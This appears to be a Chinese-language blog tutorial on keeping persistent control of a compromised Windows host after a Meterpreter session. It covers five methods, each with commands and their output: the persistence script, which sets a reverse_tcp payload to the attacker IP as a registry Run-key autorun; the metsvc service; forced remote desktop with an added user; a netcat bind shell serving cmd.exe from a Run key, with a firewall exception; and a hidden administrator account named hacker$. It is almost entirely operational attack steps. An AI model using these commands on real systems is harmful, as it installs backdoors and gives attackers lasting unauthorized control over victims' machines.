meterpreter 持久化访问的多种方式

meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。

1. 通过persistence脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# -X 开机自启动
# -i payload重连的间隔时间
# -p 反向连接端口号
# -r 反向连接IP地址
#
# 更多使用方法请参考帮助 run persistence -h
#
meterpreter > run persistence -X -i 5 -p 4444 -r 192.168.3.12
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/ .msf5 /logs/persistence/EVAN_20160604 .3957 /EVAN_20160604 .3957.rc
[*] Creating Payload=windows /meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=4444
[*] Persistent agent script is 148461 bytes long
[+] Persistent Script written to C:\DOCUME~1\wangjun\LOCALS~1\Temp\VKZehDGmg.vbs
[*] Executing script C:\DOCUME~1\wangjun\LOCALS~1\Temp\VKZehDGmg.vbs
[+] Agent executed with PID 3892
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UymiaoVKhfXxH
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UymiaoVKhfXxH

2. 通过metsvc服务的方式

运行”run metsvc”将会在目标主机上以Meterpreter的服务的形式注册在服务列表中,并开机自动自动。运行”run metsvc -r”卸载目标主机上的Meterpreter服务。

1
2
3
4
5
6
7
8
9
10
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\wangjun\LOCALS~1\Temp\PCDqsWgh...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
      * Installing service metsvc
  * Starting service
Service metsvc successfully installed.

3. 通过开启远程桌面

1
2
3
4
5
# 强制开启目标主机远程桌面并自动添加用户名为metasploit密码为meterpreter的用户
run getgui -u metasploit -p meterpreter
# 上面命令会生成清理痕迹的ruby的脚本文件,位置在/root/.msf4/logs/scripts/getgui/clean_up_xxxxx.rc
# 当操作完目标用户后可以使用此脚本清理痕迹、关闭远程桌面服务和删除创建的用户
un multi_console_command -rc /root/ .msf4 /logs/scripts/getgui/clean_up_xxxxx .rc

4. 通过nc(netcat)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# 上传nc.exe至目标主机
meterpreter > upload /root/Desktop/nc .exe c:\\windows\\system32
# 枚举查看注册表启动项
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
# 将nc.exe设置到注册表启动项中
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run - v nc -d 'c:\windows\system32\nc.exe -Ldp 455 -e cmd.exe'
# 查看以确定nc已经被设置到注册表启动项中
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run - v nc
# 进入目标系统cmd
eterpreter > execute -f cmd -i
# 查看目标系统当前防火墙规则
c:\Document and Setting\rush\Desktop > netsh firewall show opmode
# 将nc开放的端口加入到目标系统防火墙规则中
c:\Document and Setting\rush\Desktop > netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
# 查看目标系统防火墙端口开放状态
c:\Document and Setting\rush\Desktop > netsh firewall show portopening
 
# 转至攻击主机上,执行nc连接到目标主机上,得到shell
nc - v 192.168.0.3 455

5. 目标主机创建隐藏用户

1
2
3
4
# 创建用户(注意这里用户使用了$符号,可以起到隐藏创建用户的目的)
c:\Document and Setting\rush\Desktop > net user hacker$ hacker /add
# 将创建的用户添加到管理员组
c:\Document and Setting\rush\Desktop > net localgroup administrators hacker$ /add


你可能感兴趣的:(安全)